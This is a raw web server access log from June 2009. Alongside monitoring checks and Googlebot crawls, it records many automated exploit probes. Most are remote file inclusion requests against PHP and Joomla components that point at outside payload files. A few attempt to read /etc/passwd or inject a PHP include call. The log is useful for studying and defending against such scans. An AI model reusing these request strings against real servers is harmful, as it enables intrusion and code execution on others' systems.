209.59.12.99 - - [20/Jun/2009:05:53:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [20/Jun/2009:05:53:50 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [20/Jun/2009:05:53:50 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.249.36.194 - - [20/Jun/2009:05:53:50 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [20/Jun/2009:05:54:22 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:54:22 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:54:22 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:54:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001AAF4B977208007AEF011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.125.126.72 - - [20/Jun/2009:05:55:08 -0400] "GET /logs/error_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:05:55:09 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:05:55:09 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:05:55:31 -0400] "GET /logs/access_log.Q109053100/joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
66.249.71.54 - - [20/Jun/2009:05:55:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B824F83A24200FD6F04V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [20/Jun/2009:05:56:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8B827200440F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.125.126.72 - - [20/Jun/2009:05:57:30 -0400] "GET /logs/access_log.Q109061400/joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:05:57:30 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:05:57:31 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
94.23.200.54 - - [20/Jun/2009:05:57:43 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:57:43 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:57:48 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:57:48 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:05:58:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B824F83024200F96F04V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [20/Jun/2009:05:58:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.194.87.219 - - [20/Jun/2009:05:58:47 -0400] "GET /logs///home.php?pagina=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
195.207.160.102 - - [20/Jun/2009:05:59:03 -0400] "GET /logs/error_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:59:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001AAF4B972278007AEF011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.194.87.219 - - [20/Jun/2009:05:59:23 -0400] "GET /logs///index.php?pagina=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
82.194.87.219 - - [20/Jun/2009:05:59:34 -0400] "GET /logs///home.php?pagina=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
116.125.126.72 - - [20/Jun/2009:05:59:35 -0400] "GET /logs/error_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
82.194.87.219 - - [20/Jun/2009:05:59:57 -0400] "GET /logs///home.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
82.194.87.219 - - [20/Jun/2009:06:00:06 -0400] "GET /logs///index.php?pagina=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
82.194.87.219 - - [20/Jun/2009:06:00:25 -0400] "GET /logs///home.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
222.122.45.16 - - [20/Jun/2009:06:00:31 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
222.122.45.16 - - [20/Jun/2009:06:00:31 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
222.122.45.16 - - [20/Jun/2009:06:00:32 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
94.23.200.54 - - [20/Jun/2009:06:00:38 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:06:00:38 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
82.194.87.219 - - [20/Jun/2009:06:01:25 -0400] "GET /logs///home.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
66.249.71.54 - - [20/Jun/2009:06:01:27 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479C429600541F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [20/Jun/2009:06:01:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0048644B1C42B100386E04S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.194.87.219 - - [20/Jun/2009:06:02:00 -0400] "GET /logs///home.php?pagina=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
209.59.12.99 - - [20/Jun/2009:06:03:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.14 - - [20/Jun/2009:06:04:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8BD27200450F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.46.177.182 - - [20/Jun/2009:06:04:04 -0400] "GET /playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:04 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:05 -0400] "GET /logs/access_log.Q109060100/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:05 -0400] "GET /logs/access_log.Q109050800/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:08 -0400] "GET /playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:08 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:08 -0400] "GET /logs/access_log.Q109050800/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:08 -0400] "GET /logs/access_log.Q109060100/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:46 -0400] "GET /playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:50 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:50 -0400] "GET /logs/access_log.Q109060100%20%20/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:50 -0400] "GET /logs/access_log.Q109050800%20%20/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:52 -0400] "GET /playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:55 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:55 -0400] "GET /logs/access_log.Q109060100%20%20/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:04:55 -0400] "GET /logs/access_log.Q109050800%20%20/playing.php/common/db.php?commonpath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:06:05:30 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [20/Jun/2009:06:06:18 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:06:06:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8BF2C2004B0F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.250.85.185 - - [20/Jun/2009:06:06:33 -0400] "GET /logs/error_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd%00 HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:06:06:33 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd%00 HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
203.94.155.59 - - [20/Jun/2009:06:06:39 -0400] "GET //galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:39 -0400] "GET /logs//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:39 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:39 -0400] "GET //galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:39 -0400] "GET /logs//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:39 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:40 -0400] "GET //galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:40 -0400] "GET /logs//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:40 -0400] "GET //galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:40 -0400] "GET /logs//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:40 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:40 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:43 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [20/Jun/2009:06:06:46 -0400] "GET /logs/access_log.Q109052200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:47 -0400] "GET //galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:47 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:47 -0400] "GET /logs//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:47 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:47 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:50 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.40.150.211 - - [20/Jun/2009:06:06:53 -0400] "GET /logs/access_log.Q109060700//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.40.150.211 - - [20/Jun/2009:06:06:53 -0400] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.40.150.211 - - [20/Jun/2009:06:06:53 -0400] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:06:54 -0400] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:06:54 -0400] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:06:54 -0400] "GET /logs/access_log.Q109060700//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:06:55 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:06:55 -0400] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:06:55 -0400] "GET /logs/access_log.Q109060700//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:06:55 -0400] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:06:08:16 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:06:08:17 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:06:08:19 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.94.155.59 - - [20/Jun/2009:06:08:39 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:40 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:40 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:06:08:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L004A904F25D27600C1BE071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
24.39.162.98 - - [20/Jun/2009:06:08:42 -0400] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
24.39.162.98 - - [20/Jun/2009:06:08:42 -0400] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
24.39.162.98 - - [20/Jun/2009:06:08:42 -0400] "GET /logs/access_log.Q109060700//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:46 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:46 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:47 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:06:08:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.94.155.59 - - [20/Jun/2009:06:08:48 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:48 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:54 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:06:08:56 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.40.150.211 - - [20/Jun/2009:06:09:17 -0400] "GET /logs/access_log.Q109060700%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:09:19 -0400] "GET /logs/access_log.Q109060700%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:09:35 -0400] "GET /logs/access_log.Q109060700%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.40.150.211 - - [20/Jun/2009:06:09:44 -0400] "GET /logs/access_log.Q109010700%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:09:47 -0400] "GET /logs/access_log.Q109010700%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:06:09:51 -0400] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:06:09:51 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:06:09:51 -0400] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:06:09:52 -0400] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:06:09:52 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:06:09:52 -0400] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:06:10:00 -0400] "GET /logs/access_log.Q109010700%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:10:06 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:10:07 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:06:10:07 -0400] "GET /logs/access_log.Q109053100//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla